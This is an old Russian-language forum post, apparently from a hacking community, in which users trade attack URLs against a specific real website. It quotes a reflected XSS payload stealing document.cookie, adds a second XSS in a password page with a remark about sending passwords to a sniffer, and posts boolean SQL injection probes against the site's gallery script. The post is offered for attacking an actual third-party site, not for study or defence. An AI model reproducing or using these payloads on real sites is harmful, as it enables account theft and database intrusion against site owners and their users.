Показать сообщение отдельно

  #7  
Старый 25.11.2009, 18:58
Chack.
Познающий
Регистрация: 01.10.2009
Сообщений: 30
С нами: 8741930

Репутация: 101
По умолчанию

Цитата:
Сообщение от Ponchik  
http://waufon.ru/serv/index.php?ci=427"><script>alert(document.cookie)</script>
А вот тут вкуснее
http://waufon.ru/serv/my/parole.php?ci=427&id=4589&pass=antichat&url="><scr ipt>alert()</script>
пасс хранится в поле pass можем смело отсылать на сниффер, токо для каждого юзверя нужен свой ID
P.S. А в куках он ничё не хранит
P.P.S. А мля он пасс через URL передаёт, ну тогда хз
P.P.P.S: Зарегал antichat:antichat

НЯ!
http://waufon.ru/serv/galery.php?id=4589&pass=antichat&url=&ref=81339&ci =427+AND+1=1--
http://waufon.ru/serv/galery.php?id=4589&pass=antichat&url=&ref=81339&ci =427+AND+1=2--
Ты мой кумир
 
Ответить с цитированием